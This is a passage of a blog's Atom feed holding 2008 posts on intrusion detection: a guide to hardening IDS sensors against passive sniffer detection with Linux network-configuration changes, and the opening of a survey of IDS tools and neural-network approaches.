Maybe the major challenge on acquiring MSSP is knowing what the organization wants and needs before the organization actually gets it.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-1715603319865567997?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/1715603319865567997/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=1715603319865567997' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/1715603319865567997'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/1715603319865567997'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/managed-security-services-ids-solution.html' title='Managed Security Services: an IDS solution'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-373113958723101675</id><published>2008-03-25T12:00:00.000-07:00</published><updated>2008-03-25T12:11:02.276-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>Evading Passive Sniffer Detection With IDS Sensors</title><content type='html'>&lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;As Intrusion Detection (ID) technology has progressed, so too has it been increasingly considered 
a viable aspect of the "defense in depth" ideology. While ID may not necessarily be viewed as a definitively mature technology, there are certainly a multitude of options from which to choose. Each of the available Intrusion Detection Systems (IDS) offers a unique combination of capability, configuration options, and, of course, price.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;For the purpose of this discussion, the examples will apply directly to Shadow (the &lt;b&gt;S&lt;/b&gt;econdary &lt;b&gt;H&lt;/b&gt;euristic &lt;b&gt;A&lt;/b&gt;nalysis for &lt;b&gt;D&lt;/b&gt;efensive &lt;b&gt;O&lt;/b&gt;nline &lt;b&gt;W&lt;/b&gt;arfare, distributed by the &lt;st1:place st="on"&gt;&lt;st1:placename st="on"&gt;Naval&lt;/st1:placename&gt; &lt;st1:placename st="on"&gt;Surface&lt;/st1:placename&gt; &lt;st1:placename st="on"&gt;Warfare&lt;/st1:placename&gt;  &lt;st1:placetype st="on"&gt;Center&lt;/st1:placetype&gt;&lt;/st1:place&gt; and available from &lt;a href="http://www.nswc.navy.mil/ISSEC/CID/"&gt;http://www.nswc.navy.mil/ISSEC/CID/&lt;/a&gt;) running in the Linux environment. &lt;i&gt;Network Intrusion Detection: An Analyst’s Handbook, 2&lt;sup&gt;nd&lt;/sup&gt; Ed.&lt;/i&gt;, cites Snort (&lt;a href="http://www.snort.org/"&gt;http://www.snort.org&lt;/a&gt;) by Martin Roesch as having "outstripped Shadow just since December 1999" (Northcutt, &lt;i&gt;et al.&lt;/i&gt; 190); however, as Shadow is tcpdump-based the concepts are fundamentally easier to illustrate.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;So Where Is The Problem?&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Quite simply, Intrusion Detection Systems make for fairly strategic targets when their presence is discovered during network reconnaissance. 
One article, published in The Institute of Electrical and Electronics Engineers (IEEE) Software Magazine, actually asserts that "[s]mart intruders who realize that an IDS has been deployed on a network they are attacking will likely attack the IDS first, disabling it or forcing it to provide false information (distracting security personnel from the actual attack in progress)." (Allen, &lt;i&gt;et al.&lt;/i&gt; 47)&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;And why shouldn’t they? After all, an IDS sensor holds great potential for the assailant who can subvert it. In addition to allowing an outsider the ability to manipulate or censor log files to conceal his or her own presence, I would assert that the sensor contains a repository of packet capture data that likely offers a wealth of information about network topologies, user accounts, and passwords.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Further, once the sensor is captured, the attacker has free and clear access to a passive packet capture device without having to arouse any unnecessary suspicion; a network scan that reveals your IDS sensor in promiscuous mode is hardly noteworthy. Similarly, there is no need for the attacker to sanitize /var/log/messages because entries that show the adapter changing into and out of promiscuous mode appear equally innocuous.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;What Can I Do To Prevent This?&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Perhaps the best approach to reducing this threat is to first make a cursory examination of the tool set used to identify an IDS sensor. 
An understanding of a tool’s principle of operation is key in determining how to defend against it.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;For instance, the Neped (NEtwork Promiscuous Ethernet Detector) utility, distributed ca. 1998 by the Apostols group and included in several older revisions of the Trinux toolkit (&lt;a href="http://www.trinux.org/"&gt;http://www.trinux.org&lt;/a&gt;; NOTE: more recent versions have replaced Neped with the more diverse Sentinel utility available at &lt;a href="http://www.packetfactory.net/Projects/Sentinel"&gt;http://www.packetfactory.net/Projects/Sentinel&lt;/a&gt;), exploited a flaw in the manner in which some older (specifically 2.0.x and 2.1.x) Linux kernels responded to ARP requests. When in promiscuous mode, a box would reply to an ARP request regardless of the intended recipient. If one were to include this relatively compact (205 line) utility as part of a rootkit to be uploaded to a compromised site, Shadow in its infancy (remember, this was 1998) would likely have been running on one such affected kernel and thus the locations of the sensors would be immediately evident to an attacker.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;So how would this have been combated? 
The easiest manner in which to avoid such detection would have been to first append to /etc/sysconfig/network-scripts/ifcfg-eth0 a line similar to:&lt;/span&gt;&lt;/p&gt;  &lt;pre&gt;&lt;span style="font-size:12;"&gt;NOARP=yes&lt;span style=""&gt;  &lt;/span&gt;&lt;/span&gt;&lt;span style=""&gt;   &lt;/span&gt;&lt;/pre&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Then, edit the /etc/sysconfig/network-scripts/ifup script to include a branch similar to:&lt;/span&gt;&lt;/p&gt;  &lt;pre&gt;&lt;span style="font-size:12;"&gt;if [ -n "$NOARP" ]; then&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre&gt;&lt;span style="font-size:12;"&gt;&lt;span style=""&gt;               &lt;/span&gt;ifconfig ${DEVICE} -arp&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre&gt;&lt;span style="font-size:12;"&gt;fi&lt;/span&gt;&lt;/pre&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Note that the name of the variable is fairly inconsequential &lt;u&gt;so long as it does not conflict with any of the predefined variables accounted for in the network configuration script&lt;/u&gt;, as is its value; it is simply a mechanism by which the branch is activated. Once activated, this branch disables ARP resolution entirely on the sensor, thus evading Neped detection.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Unfortunately, since the days of Neped there have been many advances in passive sniffer detection. Tools such as bind’s Sentinel (cited earlier) or AntiSniff (&lt;a href="http://www.securitysoftwaretech.com/antisniff/"&gt;http://www.securitysoftwaretech.com/antisniff/&lt;/a&gt;) developed by L0pht Heavy Industries use a battery of tests to discern the existence of packet capture devices on the network. 
AntiSniff 2.0, currently under development, will run on Win9x (consequently, sensor detection can be performed &lt;u&gt;without&lt;/u&gt; a permissions structure from any accessible console), WinNT/2000, and *NIX (command line versions may be run remotely on a compromised system). Additionally, this revision "is being designed to work not only on local network segments but also across routers and switches." (S.S.T., &lt;i&gt;Technical Details&lt;/i&gt; n. pag.)&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The "Technical Details" page for AntiSniff 1.x breaks out the tests into several categories. It first prods the Operating System for flaws in the handling of various packet types. Packets are created to address the Linux ARP flaw examined by Neped, a similar ARP flaw in NetBSD, and a broadcast Ethernet flaw in Win9x/NT. The next round of tests forges packets to provoke a reverse DNS lookup on fictitious addresses; the premise here (simplified, of course) is that if a machine is not in promiscuous mode then it will not process a packet with a destination IP not its own and thus there will be no DNS request if a sniffer is not present. The final round of tests benchmarks the network and specific boxes at a baseline level and under duress (&lt;i&gt;i.e.&lt;/i&gt;, during periods of substantial network traffic). Theoretically, a machine discarding all packets destined for IP addresses not its own at the link layer should not exhibit significantly different performance metrics during periods of forced network congestion, provided said congestion is not directly addressed to that box.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Several aspects of packet capture detection have been built into AntiSniff; however, not one is indefensible where IDS sensors are concerned. 
While the methodology employed by AntiSniff is by no means canonical (&lt;i&gt;i.e.&lt;/i&gt;, there are other, less effective methods of sniffer detection not incorporated into AntiSniff 1.x), similar defensive tactics would apply.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Going back to our original example of Shadow running on a Linux platform, the Neped discussion has already addressed the ARP test. While this is not applicable on all Linux or BSD kernels, a little preventative medicine never hurts.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The DNS issue may be dealt with similarly by altering the Shadow configuration as follows in /usr/local/logger/sensor/start_logger.pl:&lt;/span&gt;&lt;/p&gt;  &lt;pre&gt;&lt;span style="font-size:12;"&gt;# Prepare the parameters to pass to the tcpdump program.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre&gt;&lt;span style="font-size:12;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre&gt;&lt;span style="font-size:12;"&gt;&lt;span style=""&gt;   &lt;/span&gt;$param =&lt;span style=""&gt;  &lt;/span&gt;"$PROGPAR -n -s 4096 -w - -F $FILTER";&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre&gt;&lt;span style="font-size:12;"&gt;&lt;span style=""&gt;   &lt;/span&gt;$param .= " 2&gt;&gt;$LOGDIR/tcpdump.err | $GZIPPROG &gt; $TCPLOG4 2&gt;/dev/null";&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre&gt;&lt;span style="font-size:12;"&gt;#&lt;/span&gt;&lt;/pre&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The addition of the ‘-n’ parameter disables DNS resolution while the logs are being collected. An alternate solution would be deleting the /etc/resolv.conf file thereby disabling DNS resolution altogether. 
Once the logs have been transferred, either to the analyzer or an intermediate "safe" host, DNS information can be added into the logs on an "as needed" basis without altering the original by:&lt;/span&gt;&lt;/p&gt;  &lt;pre&gt;&lt;span style="font-size:12;"&gt;tcpdump -a -r tcp.2001030101 &gt; tcp.2001030101.dns&lt;/span&gt;&lt;/pre&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Dealing With Latency Tests&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The latency test is perhaps the most effective in the AntiSniff arsenal; no addressable production system will escape this test. The significant qualifier here is "addressable." The AntiSniff "Goals and Purpose" statement is pretty clear that "[i]f a machine on the network has no IP address, no IP stack associated with any of its interfaces, or has no ability to be communicated with over the network then AntiSniff will not detect it. This is perfectly acceptable, as such a machine would not be compromised over a network in the first place." (S.S.T., &lt;i&gt;Purpose&lt;/i&gt; n. pag.)&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The beauty of a non-addressable IDS sensor is that it provides a virtually undetectable monitoring capability (the "virtually" caveat is included for various reasons, not the least of which is that anyone having physical access to the infrastructure may notice the "extra" box that displays the promiscuity status of an adapter on the console once an hour). 
A scan of the IP range will not give up the location of the sensor, and its existence is equally difficult to discern with passive sniffer detection utilities.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;This configuration will require, first and foremost, that a second Ethernet adapter be installed in the sensor. The key here is that this second adapter is not to have an IP address bound to it. Unfortunately, most modern Linux distributions have a very well-meaning feature that brings adapters lacking addresses down after boot; however, this is easily remedied.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The "quick and dirty" solution would be to add the following as the last line of the ‘start)’ section of /etc/rc.d/init.d/network:&lt;/span&gt;&lt;/p&gt;  &lt;pre&gt;&lt;span style="font-size:12;"&gt;ifconfig eth1 up&lt;span style=""&gt;  &lt;/span&gt;&lt;/span&gt;&lt;span style=""&gt;   &lt;/span&gt;&lt;/pre&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The more elegant solution would be to modify the network scripts such that they allow for an adapter without an IP address. Linux does not create a configuration file for an adapter without an address, so:&lt;/span&gt;&lt;/p&gt;  &lt;pre&gt;&lt;span style="font-size:12;"&gt;cd /etc/sysconfig/network-scripts/&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre&gt;&lt;span style="font-size:12;"&gt;cp ifcfg-eth0 ifcfg-eth1&lt;/span&gt;&lt;span style=""&gt;     &lt;/span&gt;&lt;/pre&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Having done that, edit ifcfg-eth1 and remove the IPADDR, NETMASK, NETWORK, and BROADCAST entries. Edit the remaining entries such that DEVICE=eth1, ATBOOT=yes, and BOOTPROTO=none. 
Finally, append an entry to ifcfg-eth1 that is similar to:&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;NOIPADDR=yes&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Then, edit the /etc/sysconfig/network-scripts/ifup script to include a branch similar to:&lt;/span&gt;&lt;/p&gt;  &lt;pre&gt;&lt;span style="font-size:12;"&gt;if [ -n "$NOIPADDR" ]; then&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre&gt;&lt;span style="font-size:12;"&gt;&lt;span style=""&gt;               &lt;/span&gt;ifconfig ${DEVICE} up&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre&gt;&lt;span style="font-size:12;"&gt;fi&lt;/span&gt;&lt;/pre&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;As in the case of the ARP example, the exact variable name is unimportant so long as there is no duplication. The preferred placement of this branch is immediately before the ‘else’ statement to which "regular" adapters with pre-specified IP addresses fall through.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;It should be noted that this modification negates the impact of the ARP and DNS modifications, as neither applies when a machine is not addressable. In other words, this change supersedes the other solutions addressed previously. &lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;If the sensor is on an insecure hub (&lt;i&gt;e.g.&lt;/i&gt;, at the perimeter, in the DMZ, etc.) and your threat model includes only outside attacks, eth0 of this sensor can tie back into your internal network. 
If there is a considerable internal threat, it may be advisable to implement an isolated network for your sensors and analyzer that is non-routable from all internal and external subnets. As per usual, there is a trade-off here between usability/accessibility and security, to be determined by each individual circumstance.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;For The Truly Paranoid…&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;It is possible to take this to yet another level. Those of us that have worked with 10Base5 Ethernet (&lt;i&gt;i.e.&lt;/i&gt;, AUI or "thicknet") before may remember a method of trimming connector pins or cable conductors to create a "receive only" connection. &lt;u&gt;Be careful&lt;/u&gt;&lt;i&gt; &lt;/i&gt;with this; if installed incorrectly, a modified cable could result in a "transmit only" system that would prevent the collection of any data. Pins 3 and 10 of the AUI connector are responsible for establishing the transmit connection; if the connections are physically severed, it is electrically impossible for that connection to transmit data. It is worth mentioning here that with a set of complicated equations and some equally complex monitoring equipment it may be possible to determine that there is a "receive only" system operating on a network from its electrical characteristics; however, to my knowledge this is not possible without physical access.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;NOTE: I would advise against applying this principle to twisted pair Ethernet cabling. 
After some frustration and several support calls to equipment manufacturers, you will soon discover that most twisted pair devices will not produce a link when the transmit pair is cut as there are line verification routines within most modern enterprise-grade interconnection equipment (&lt;i&gt;e.g.&lt;/i&gt;, hubs, switches). Rumor has it that this configuration is possible with 10/100BaseT, although it may not be worth the potential sacrifice of your data’s integrity. Several 10Base5 NICs are still commercially available, as are AUI transceiver modules for hubs (&lt;i&gt;e.g.&lt;/i&gt;, the 3Com 3C1206-0).&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;In Conclusion&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;span style=";font-family:Arial;font-size:10;"  &gt;IDS sensors are potentially as valuable a resource (if not more so) as the network elements they serve to protect. Patch levels should be kept current, and routines should be implemented to reduce the volume of log data that accumulates on the sensors. Where possible, efforts should be taken to conceal the very existence of sensors as the information they contain could contribute significantly to the compromise of several additional systems. 
In short, recognize the IDS as an asset with significant potential for either network protection &lt;u&gt;or&lt;/u&gt; compromise and defend it accordingly.&lt;/span&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/373113958723101675/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=373113958723101675' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/373113958723101675'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/373113958723101675'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/evading-passive-sniffer-detection-with.html' title='Evading Passive Sniffer Detection With IDS Sensors'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-4964442673905788038</id><published>2008-03-25T11:58:00.001-07:00</published><updated>2008-03-31T20:16:44.139-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title type='text'>Application of Neural Networks to Intrusion Detection</title><content type='html'>&lt;p&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Introduction&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span 
style=";font-family:Arial;font-size:10;"  &gt;Intrusion Detection Systems ( IDS ) are now mainly employed to secure company networks. Ideally, an IDS has the capacity to detect in real-time all ( attempted ) intrusions, and to take action to stop the attack ( for example, modifying firewall rules ). We present in this paper a « state of the art » of Intrusion Detection Systems, covering commercial and research tools, and a new way to improve false-alarm detection using a Neural Network approach. This approach is still in development; nevertheless, it seems to be very promising for the future.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;This paper is organized as follows : first, we present the global architecture of IDS and a few commercially available tools, then we analyze new axes of research to improve IDS performance, particularly the application of Neural Networks to Intrusion Detection.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Classification of Intrusion Detection Systems&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A guidance document on Intrusion Detection Systems is available from the National Institute of Standards and Technology ( NIST ) [1].&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Intrusion Detection Systems can be classified into three categories :&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;host-based IDS, evaluate information found on a      single or multiple host systems, including contents of operating systems,      system and application files.&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;network-based IDS, evaluate information captured      from 
network communications, analyzing the stream of packets traveling      across the network. Packets are captured through a set of sensors.&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;vulnerability-assessment IDS, detect      vulnerabilities on internal networks and firewalls&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;There are two primary models for analyzing events to detect attacks:&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;misuse detection model : IDS detect      intrusions by looking for activity that corresponds to known signatures of      intrusions or vulnerabilities&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;anomaly detection model : IDS detect      intrusions by searching for « abnormal » network traffic&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Most commercial IDS tools rely on the misuse detection model, and signatures of intrusions must always be updated by vendors.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;IDS based on the anomaly detection model have the ability to detect symptoms of attacks without specifying a model of the attacks, but they are very sensitive to false alarms.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Commercially available tools&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A Jackson [2] of Los 
Alamos National Laboratory wrote a complete survey of IDS products. Characteristics for each of the seventeen products are studied according to nine major features :&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;suitability for IDS architecture and management      scheme&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;flexibility of adaptation for a specific network      to be monitored&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;protection against malicious tampering&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;interoperability with other network management      and security tools&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;comprehensiveness, to expand the concept of      intrusion detection such as blocking Java applets or Active-X controls,      monitoring e-mail content, blocking specific urls&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;event management, such as managing and reporting      event trace, updating attack database&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;active response when an attack occurs, such as      firewall or router reconfiguration&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;support for product&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Another recent market survey of commercially available Intrusion Detection tools today is available in [3]. 
We present here examples of IDS tools, classified according to the three models : host-based, network-based and vulnerability-assessment tools.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Host-based IDS tools&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Host-based IDS systems detect attacks on an individual system, using system logs and operating system audit trails. Examples of well-known host-based commercial tools are : Cybercop from Network Associates ( NAI ) ( http://www.pgp.com ) and KaneSecurity Monitor ( KSM ) from RSA Security ( http://www.rsasecuriy.com ). Tripwire ( http://www.tripwire.org ) is a specific tool to detect changes to administrative or user files on one server.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Network-based IDS tools&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Network-based IDS systems detect attacks by capturing and analyzing network packets, from « sensors » placed at various points in a network. 
Examples of well-known Network-based commercial tools are : RealSecure from Internet Security Scanner ( ISS ) ( http://www.iss.net ), Cisco Secure IDS or NetRanger from Cisco Systems ( formerly Wheel Group Corporation ), Centrax from CyberSafe corporation, and Network Flight Recorder NFR.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A popular and freely-available Network-based IDS is Snort, a lightweight IDS ( http://www.snort.org ).&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The main difficulty for Network-based IDS is to process all packets for a large network in real time ; specific hardware solutions may be employed. Another problem is the segmentation of networks by switches, which makes it difficult to capture traffic for the whole network.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Vulnerability-assessment tools&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Vulnerability-assessment tools are security scanners used to detect known vulnerabilities in a specific operating system configuration. Examples of well-known vulnerability-assessment tools are : CyberCop Scanner from PGP Security ( a Network Associates Division ) and SecureScan NX from Networks Vigilance ( formerly known as NV e-secure ).&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A freely-available vulnerability-assessment tool is Nessus, a Linux-based vulnerability scanner ( http://www.nessus.org ) written by R. 
